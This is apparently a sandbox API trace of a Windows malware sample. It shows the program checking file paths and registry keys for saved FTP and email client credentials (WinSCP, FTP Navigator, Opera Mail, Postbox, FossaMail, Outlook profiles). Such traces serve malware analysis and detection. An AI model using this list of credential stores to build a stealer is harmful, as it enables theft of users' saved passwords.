pszPath="C:\\Program Files (x86)") returned 0x0 [0315.012] GetProcessHeap () returned 0x780000 [0315.012] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f7c) returned 0x79b520 [0315.013] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0315.013] wvsprintfW (in: param_1=0x79b520, param_2="%s\\WinFtp Client\\Favorites.dat", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\WinFtp Client\\Favorites.dat") returned 50 [0315.013] GetProcessHeap () returned 0x780000 [0315.013] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x68) returned 0x79a550 [0315.013] GetProcessHeap () returned 0x780000 [0315.014] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b520 | out: hHeap=0x780000) returned 1 [0315.015] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.015] PathFileExistsW (pszPath="C:\\Program Files (x86)\\WinFtp Client\\Favorites.dat") returned 0 [0315.015] GetProcessHeap () returned 0x780000 [0315.015] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a550 | out: hHeap=0x780000) returned 1 [0315.015] GetProcessHeap () returned 0x780000 [0315.016] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0315.016] GetProcessHeap () returned 0x780000 [0315.016] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3e8) returned 0x79b520 [0315.016] GetProcessHeap () returned 0x780000 [0315.016] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xc) returned 0x78b640 [0315.016] GetProcessHeap () returned 0x780000 [0315.016] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b3a0 [0315.016] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.017] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Martin Prikryl", phkResult=0x79b3a0 | out: phkResult=0x79b3a0*=0x0) returned 0x2 [0315.017] GetProcessHeap () returned 0x780000 [0315.017] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b3a0 | out: hHeap=0x780000) returned 1 [0315.017] GetProcessHeap () returned 0x780000 [0315.017] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b4f0 [0315.018] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.018] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Martin Prikryl", phkResult=0x79b4f0 | out: phkResult=0x79b4f0*=0x0) returned 0x2 [0315.019] GetProcessHeap () returned 0x780000 [0315.019] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b4f0 | out: hHeap=0x780000) returned 1 [0315.019] GetProcessHeap () returned 0x780000 [0315.019] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b520 | out: hHeap=0x780000) returned 1 [0315.019] GetProcessHeap () returned 0x780000 [0315.019] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x78b640 | out: hHeap=0x780000) returned 1 [0315.019] GetProcessHeap () returned 0x780000 [0315.019] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a2e8 [0315.020] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0315.020] SHGetFolderPathW (in: hwnd=0x0, csidl=36, hToken=0x0, dwFlags=0x0, pszPath=0x79a2e8 | out: pszPath="C:\\Windows") returned 0x0 [0315.020] GetProcessHeap () returned 0x780000 [0315.020] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f5e) returned 0x79b520 [0315.021] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0315.022] wvsprintfW (in: param_1=0x79b520, param_2="%s\\32BitFtp.TMP", arglist=0x19fba0 | out: param_1="C:\\Windows\\32BitFtp.TMP") returned 23 [0315.022] GetProcessHeap () returned 0x780000 [0315.022] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x32) returned 0x78d248 [0315.022] GetProcessHeap () returned 0x780000 [0315.022] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b520 | out: hHeap=0x780000) returned 1 [0315.023] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.023] PathFileExistsW (pszPath="C:\\Windows\\32BitFtp.TMP") returned 0 [0315.023] GetProcessHeap () returned 0x780000 [0315.024] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x78d248 | out: hHeap=0x780000) returned 1 [0315.024] GetProcessHeap () returned 0x780000 [0315.024] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0315.024] GetProcessHeap () returned 0x780000 [0315.024] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a2e8 [0315.025] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0315.025] SHGetFolderPathW (in: hwnd=0x0, csidl=36, hToken=0x0, dwFlags=0x0, pszPath=0x79a2e8 | out: pszPath="C:\\Windows") returned 0x0 [0315.025] GetProcessHeap () returned 0x780000 [0315.025] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f5e) returned 0x79b520 [0315.026] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0315.032] wvsprintfW (in: param_1=0x79b520, param_2="%s\\32BitFtp.ini", arglist=0x19fb94 | out: param_1="C:\\Windows\\32BitFtp.ini") returned 23 [0315.032] GetProcessHeap () returned 0x780000 [0315.032] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x32) returned 0x78d388 [0315.032] GetProcessHeap () returned 0x780000 [0315.033] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b520 | out: hHeap=0x780000) returned 1 [0315.034] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.034] PathFileExistsW (pszPath="C:\\Windows\\32BitFtp.ini") returned 0 [0315.034] GetProcessHeap () returned 0x780000 [0315.034] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x78d388 | out: hHeap=0x780000) returned 1 [0315.034] GetProcessHeap () returned 0x780000 [0315.035] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0315.035] GetProcessHeap () returned 0x780000 [0315.035] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a2e8 [0315.035] ExpandEnvironmentStringsW (in: lpSrc="%SYSTEMDRIVE%", lpDst=0x79a2e8, nSize=0x104 | out: lpDst="C:") returned 0x3 [0315.035] GetProcessHeap () returned 0x780000 [0315.035] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f78) returned 0x79b520 [0315.036] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0315.037] wvsprintfW (in: param_1=0x79b520, param_2="%s\\FTP Navigator\\Ftplist.txt", arglist=0x19fba0 | out: param_1="C:\\FTP Navigator\\Ftplist.txt") returned 28 [0315.037] GetProcessHeap () returned 0x780000 [0315.037] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3c) returned 0x794798 [0315.037] GetProcessHeap () returned 0x780000 [0315.037] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b520 | out: hHeap=0x780000) returned 1 [0315.038] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.038] PathFileExistsW (pszPath="C:\\FTP Navigator\\Ftplist.txt") returned 0 [0315.038] GetProcessHeap () returned 0x780000 [0315.039] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x794798 | out: hHeap=0x780000) returned 1 [0315.039] GetProcessHeap () returned 0x780000 [0315.039] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0315.039] GetProcessHeap () returned 0x780000 [0315.039] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a2e8 [0315.039] ExpandEnvironmentStringsW (in: lpSrc="%SYSTEMDRIVE%", lpDst=0x79a2e8, nSize=0x104 | out: lpDst="C:") returned 0x3 [0315.039] GetProcessHeap () returned 0x780000 [0315.039] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f92) returned 0x79b520 [0315.040] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0315.041] wvsprintfW (in: param_1=0x79b520, param_2="%s\\Softwarenetz\\Mailing\\Daten\\mailing.vdt", arglist=0x19fb40 | out: param_1="C:\\Softwarenetz\\Mailing\\Daten\\mailing.vdt") returned 41 [0315.041] GetProcessHeap () returned 0x780000 [0315.041] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x56) returned 0x79a550 [0315.041] GetProcessHeap () returned 0x780000 [0315.041] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b520 | out: hHeap=0x780000) returned 1 [0315.042] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.042] PathFileExistsW (pszPath="C:\\Softwarenetz\\Mailing\\Daten\\mailing.vdt") returned 0 [0315.043] GetProcessHeap () returned 0x780000 [0315.043] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a550 | out: hHeap=0x780000) returned 1 [0315.043] GetProcessHeap () returned 0x780000 [0315.044] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0315.044] GetProcessHeap () returned 0x780000 [0315.044] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f82) returned 0x79b520 [0315.044] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0315.045] wvsprintfW (in: param_1=0x79b520, param_2="%s\\Opera Mail\\Opera Mail\\wand.dat", arglist=0x19fb4c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Mail\\Opera Mail\\wand.dat") returned 68 [0315.045] GetProcessHeap () returned 0x780000 [0315.045] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x8c) returned 0x79a2e8 [0315.045] GetProcessHeap () returned 0x780000 [0315.046] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b520 | out: hHeap=0x780000) returned 1 [0315.046] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.046] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Mail\\Opera Mail\\wand.dat") returned 0 [0315.047] GetProcessHeap () returned 0x780000 [0315.047] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0315.047] GetProcessHeap () returned 0x780000 [0315.047] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79b520 [0315.048] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.048] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Postbox\\Postbox", pszValue="CurrentVersion", pdwType=0x0, pvData=0x79b520, pcbData=0x19fba4*=0x104 | out: pdwType=0x0, pvData=0x79b520, pcbData=0x19fba4*=0x104) returned 0x2 [0315.048] GetProcessHeap () returned 0x780000 [0315.048] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b520 | out: hHeap=0x780000) returned 1 [0315.048] GetProcessHeap () returned 0x780000 [0315.048] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79b520 [0315.049] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.050] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Mozilla\\FossaMail", pszValue="CurrentVersion", pdwType=0x0, pvData=0x79b520, pcbData=0x19fba4*=0x104 | out: pdwType=0x0, pvData=0x79b520, pcbData=0x19fba4*=0x104) returned 0x2 [0315.050] GetProcessHeap () returned 0x780000 [0315.050] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b520 | out: hHeap=0x780000) returned 1 [0315.050] GetProcessHeap () returned 0x780000 [0315.050] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a2e8 [0315.051] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0315.052] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x79a2e8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0315.053] Sleep (dwMilliseconds=0xa) [0315.077] GetProcessHeap () returned 0x780000 [0315.077] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f4a) returned 0x79b520 [0315.078] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0315.078] wvsprintfW (in: param_1=0x79b520, param_2="%s\\%s", arglist=0x19f8f4 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\*Mailbox.ini") returned 44 [0315.078] GetProcessHeap () returned 0x780000 [0315.078] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x5c) returned 0x79a550 [0315.079] GetProcessHeap () returned 0x780000 [0315.079] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b520 | out: hHeap=0x780000) returned 1 [0315.079] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*Mailbox.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\*mailbox.ini"), lpFindFileData=0x19f908 | out: lpFindFileData=0x19f908*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x207d0, ftCreationTime.dwHighDateTime=0x20000, ftLastAccessTime.dwLowDateTime=0x48, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x787868, ftLastWriteTime.dwHighDateTime=0x787868, nFileSizeHigh=0x793fd8, nFileSizeLow=0x794310, dwReserved0=0x0, dwReserved1=0x19f964, cFileName="ը瞆", cAlternateFileName="뒭蕬͈읩葂㓛ﭬ\x19䂑@")) returned 0xffffffff [0315.080] GetProcessHeap () returned 0x780000 [0315.080] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a550 | out: hHeap=0x780000) returned 1 [0315.080] GetProcessHeap () returned 0x780000 [0315.080] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0315.080] GetProcessHeap () returned 0x780000 [0315.080] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3e8) returned 0x79b520 [0315.080] GetProcessHeap () returned 0x780000 [0315.080] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xc) returned 0x78b640 [0315.081] GetProcessHeap () returned 0x780000 [0315.081] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b510 [0315.081] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.082] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\WinChips\\UserAccounts", phkResult=0x79b510 | out: phkResult=0x79b510*=0x0) returned 0x2 [0315.082] GetProcessHeap () returned 0x780000 [0315.082] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b510 | out: hHeap=0x780000) returned 1 [0315.082] GetProcessHeap () returned 0x780000 [0315.082] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b520 | out: hHeap=0x780000) returned 1 [0315.082] GetProcessHeap () returned 0x780000 [0315.083] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x78b640 | out: hHeap=0x780000) returned 1 [0315.083] GetProcessHeap () returned 0x780000 [0315.083] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3e8) returned 0x79b520 [0315.083] GetProcessHeap () returned 0x780000 [0315.083] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xc) returned 0x78b640 [0315.083] GetProcessHeap () returned 0x780000 [0315.083] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b4f0 [0315.083] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.084] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", phkResult=0x79b4f0 | out: phkResult=0x79b4f0*=0x0) returned 0x2 [0315.084] GetProcessHeap () returned 0x780000 [0315.084] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b4f0 | out: hHeap=0x780000) returned 1 [0315.084] GetProcessHeap () returned 0x780000 [0315.084] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b390 [0315.085] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.085] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook", phkResult=0x79b390 | out: phkResult=0x79b390*=0x0) returned 0x2 [0315.086] GetProcessHeap () returned 0x780000 [0315.086] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b390 | out: hHeap=0x780000) returned 1 [0315.086] GetProcessHeap () returned 0x780000 [0315.086] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b440 [0315.086] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.087] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook", phkResult=0x79b440 | out: phkResult=0x79b440*=0x218) returned 0x0 [0315.087] GetProcessHeap () returned 0x780000 [0315.087] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79b910 [0315.088] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.088] SHEnumKeyExW (in: hkey=0x218, dwIndex=0x0, pszName=0x79b910, pcchName=0x19fb7c | out: pszName="0a0d020000000000c000000000000046", pcchName=0x19fb7c) returned 0x0 [0315.088] GetProcessHeap () returned 0x780000 [0315.088] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b350 [0315.090] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.090] RegOpenKeyW (in: hKey=0x218, lpSubKey="0a0d020000000000c000000000000046", phkResult=0x79b350 | out: phkResult=0x79b350*=0x210) returned 0x0 [0315.090] GetProcessHeap () returned 0x780000 [0315.090] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79bd28 [0315.091] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.091] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x79bd28, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x79bd28, pcbData=0x19f6f0*=0x208) returned 0x2 [0315.091] GetProcessHeap () returned 0x780000 [0315.092] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79bd28 | out: hHeap=0x780000) returned 1 [0315.092] GetProcessHeap () returned 0x780000 [0315.092] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f4a) returned 0x79bd28 [0315.092] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0315.093] wvsprintfW (in: param_1=0x79bd28, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046") returned 88 [0315.093] GetProcessHeap () returned 0x780000 [0315.093] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xb4) returned 0x79a2e8 [0315.093] GetProcessHeap () returned 0x780000 [0315.094] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79bd28 | out: hHeap=0x780000) returned 1 [0315.094] GetProcessHeap () returned 0x780000 [0315.094] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b430 [0315.094] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.095] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", phkResult=0x79b430 | out: phkResult=0x79b430*=0x204) returned 0x0 [0315.095] GetProcessHeap () returned 0x780000 [0315.095] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79bd28 [0315.095] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.096] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x79bd28, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0315.096] GetProcessHeap () returned 0x780000 [0315.096] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79bd28 | out: hHeap=0x780000) returned 1 [0315.097] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.097] RegCloseKey (hKey=0x204) returned 0x0 [0315.097] GetProcessHeap () returned 0x780000 [0315.097] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b430 | out: hHeap=0x780000) returned 1 [0315.097] GetProcessHeap () returned 0x780000 [0315.097] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0315.098] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.099] RegCloseKey (hKey=0x210) returned 0x0 [0315.099] GetProcessHeap () returned 0x780000 [0315.099] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b350 | out: hHeap=0x780000) returned 1 [0315.100] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.100] SHEnumKeyExW (in: hkey=0x218, dwIndex=0x1, pszName=0x79b910, pcchName=0x19fb7c | out: pszName="13dbb0c8aa05101a9bb000aa002fc45a", pcchName=0x19fb7c) returned 0x0 [0315.100] GetProcessHeap () returned 0x780000 [0315.100] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b410 [0315.101] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.102] RegOpenKeyW (in: hKey=0x218, lpSubKey="13dbb0c8aa05101a9bb000aa002fc45a", phkResult=0x79b410 | out: phkResult=0x79b410*=0x210) returned 0x0 [0315.102] GetProcessHeap () returned 0x780000 [0315.102] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79bd28 [0315.103] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.103] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x79bd28, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x79bd28, pcbData=0x19f6f0*=0x208) returned 0x2 [0315.103] GetProcessHeap () returned 0x780000 [0315.104] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79bd28 | out: hHeap=0x780000) returned 1 [0315.104] GetProcessHeap () returned 0x780000 [0315.104] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f4a) returned 0x79bd28 [0315.104] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0315.106] wvsprintfW (in: param_1=0x79bd28, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a") returned 88 [0315.106] GetProcessHeap () returned 0x780000 [0315.106] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xb4) returned 0x79a2e8 [0315.106] GetProcessHeap () returned 0x780000 [0315.106] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79bd28 | out: hHeap=0x780000) returned 1 [0315.106] GetProcessHeap () returned 0x780000 [0315.106] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b4a0 [0315.107] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.108] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", phkResult=0x79b4a0 | out: phkResult=0x79b4a0*=0x204) returned 0x0 [0315.108] GetProcessHeap () returned 0x780000 [0315.108] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79bd28 [0315.109] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.109] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x79bd28, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0315.109] GetProcessHeap () returned 0x780000 [0315.109] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79bd28 | out: hHeap=0x780000) returned 1 [0315.110] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.111] RegCloseKey (hKey=0x204) returned 0x0 [0315.111] GetProcessHeap () returned 0x780000 [0315.111] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b4a0 | out: hHeap=0x780000) returned 1 [0315.111] GetProcessHeap () returned 0x780000 [0315.111] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0315.112] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.112] RegCloseKey (hKey=0x210) returned 0x0 [0315.112] GetProcessHeap () returned 0x780000 [0315.112] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b410 | out: hHeap=0x780000) returned 1 [0315.113] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.113] SHEnumKeyExW (in: hkey=0x218, dwIndex=0x2, pszName=0x79b910, pcchName=0x19fb7c | out: pszName="2db91c5fd8470d46b1a5bc5efab4cae7", pcchName=0x19fb7c) returned 0x0 [0315.113] GetProcessHeap () returned 0x780000 [0315.113] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b450 [0315.114] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.114] RegOpenKeyW (in: hKey=0x218, lpSubKey="2db91c5fd8470d46b1a5bc5efab4cae7", phkResult=0x79b450 | out: phkResult=0x79b450*=0x210) returned 0x0 [0315.115] GetProcessHeap () returned 0x780000 [0315.115] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79bd28 [0315.115] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.116] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x79bd28, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x79bd28, pcbData=0x19f6f0*=0x208) returned 0x2 [0315.116] GetProcessHeap () returned 0x780000 [0315.116] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79bd28 | out: hHeap=0x780000) returned 1 [0315.116] GetProcessHeap () returned 0x780000 [0315.116] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f4a) returned 0x79bd28 [0315.117] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0315.117] wvsprintfW (in: param_1=0x79bd28, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\2db91c5fd8470d46b1a5bc5efab4cae7") returned 88 [0315.117] GetProcessHeap () returned 0x780000 [0315.118] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xb4) returned 0x79a2e8 [0315.118] GetProcessHeap () returned 0x780000 [0315.118] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79bd28 | out: hHeap=0x780000) returned 1 [0315.118] GetProcessHeap () returned 0x780000 [0315.118] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b410 [0315.119] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.119] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\2db91c5fd8470d46b1a5bc5efab4cae7", phkResult=0x79b410 | out: phkResult=0x79b410*=0x204) returned 0x0 [0315.120] GetProcessHeap () returned 0x780000 [0315.120] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79bd28 [0315.123] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.123] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x79bd28, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0315.123] GetProcessHeap () returned 0x780000 [0315.123] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79bd28 | out: hHeap=0x780000) returned 1 [0315.124] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.124] RegCloseKey (hKey=0x204) returned 0x0 [0315.125] GetProcessHeap () returned 0x780000 [0315.125] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b410 | out: hHeap=0x780000) returned 1 [0315.125] GetProcessHeap () returned 0x780000 [0315.125] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 